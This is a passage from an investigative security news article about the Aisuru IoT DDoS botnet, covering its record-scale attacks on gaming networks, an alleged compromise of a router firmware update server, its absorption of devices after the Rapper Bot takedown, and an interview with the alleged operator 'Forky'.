The Aisuru botnet harkens back to its predecessor Mirai in another intriguing way. One of its owners is using the Telegram handle “9gigsofram,” which corresponds to the nickname used by the co-owner of a Minecraft server protection service called Proxypipe that was heavily targeted in 2016 by the original Mirai botmasters.

Robert Coelho co-ran Proxypipe back then along with his business partner Erik “9gigsofram” Buckingham, and has spent the past nine years fine-tuning various DDoS mitigation companies that cater to Minecraft server operators and other gaming enthusiasts. Coelho said he has no idea why one of Aisuru’s botmasters chose Buckingham’s nickname, but added that it might say something about how long this person has been involved in the DDoS-for-hire industry.

“The Aisuru attacks on the gaming networks these past seven day have been absolutely huge, and you can see tons of providers going down multiple times a day,” Coelho said.

Coelho said the 15 Tbps attack this week against TCPShield was likely only a portion of the total attack volume hurled by Aisuru at the time, because much of it would have been shoved through networks that simply couldn’t process that volume of traffic all at once. Such outsized attacks, he said, are becoming increasingly difficult and expensive to mitigate.

“It’s definitely at the point now where you need to be spending at least a million dollars a month just to have the network capacity to be able to deal with these attacks,” he said.

RAPID SPREAD

Aisuru has long been rumored to use multiple zero-day vulnerabilities in IoT devices to aid its rapid growth over the past year. XLab, the Chinese security company that was the first to profile Aisuru’s rise in 2024, warned last month that one of the Aisuru botmasters had compromised the firmware distribution website for Totolink, a maker of low-cost routers and other networking gear.

“Multiple sources indicate the group allegedly compromised a router firmware update server in April and distributed malicious scripts to expand the botnet,” XLab wrote on September 15. “The node count is currently reported to be around 300,000.”

A malicious script implanted into a Totolink update server in April 2025. Image: XLab.

Aisuru’s operators received an unexpected boost to their crime machine in August when the U.S. Department Justice charged the alleged proprietor of Rapper Bot, a DDoS-for-hire botnet that competed directly with Aisuru for control over the global pool of vulnerable IoT systems.

Once Rapper Bot was dismantled, Aisuru’s curators moved quickly to commandeer vulnerable IoT devices that were suddenly set adrift by the government’s takedown, Dobbins said.

“Folks were arrested and Rapper Bot control servers were seized and that’s great, but unfortunately the botnet’s attack assets were then pieced out by the remaining botnets,” he said. “The problem is, even if those infected IoT devices are rebooted and cleaned up, they will still get re-compromised by something else generally within minutes of being plugged back in.”

A screenshot shared by XLabs showing the Aisuru botmasters recently celebrating a record-breaking 7.7 Tbps DDoS. The user at the top has adopted the name “Ethan J. Foltz” in a mocking tribute to the alleged Rapper Bot operator who was arrested and charged in August 2025.

BOTMASTERS AT LARGE

XLab’s September blog post cited multiple unnamed sources saying Aisuru is operated by three cybercriminals: “Snow,” who’s responsible for botnet development; “Tom,” tasked with finding new vulnerabilities; and “Forky,” responsible for botnet sales.

KrebsOnSecurity interviewed Forky in our May 2025 story about the record 6.3 Tbps attack from Aisuru. That story identified Forky as a 21-year-old man from Sao Paulo, Brazil who has been extremely active in the DDoS-for-hire scene since at least 2022. The FBI has seized Forky’s DDoS-for-hire domains several times over the years.

Like the original Mirai botmasters, Forky also operates a DDoS mitigation service called Botshield. Forky declined to discuss the makeup of his ISP’s clientele, or to clarify whether Botshield was more of a hosting provider or a DDoS mitigation firm. However, Forky has posted on Telegram about Botshield successfully mitigating large DDoS attacks launched against other DDoS-for-hire services.

In our previous interview, Forky acknowledged being involved in the development and marketing of Aisuru, but denied participating in attacks launched by the botnet.

Reached for comment earlier this month, Forky continued to maintain his innocence, claiming that he also is still trying to figure out who the current Aisuru botnet operators are in real life (Forky said the same thing in our May interview).

But after a week of promising juicy details, Forky came up empty-handed once again. Suspecting that Forky was merely being coy, I asked him how someone so connected to the DDoS-for-hire world could still be mystified on this point, and suggested that his inability or unwillingness to blame anyone else for Aisuru would not exactly help his case.

At this, Forky verbally bristled at being pressed for more details, and abruptly terminated our interview.

“I’m not here to be threatened with ignorance because you are stressed,” Forky replied. “They’re blaming me for those new attacks. Pretty much the whole world (is) due to your blog.”

❌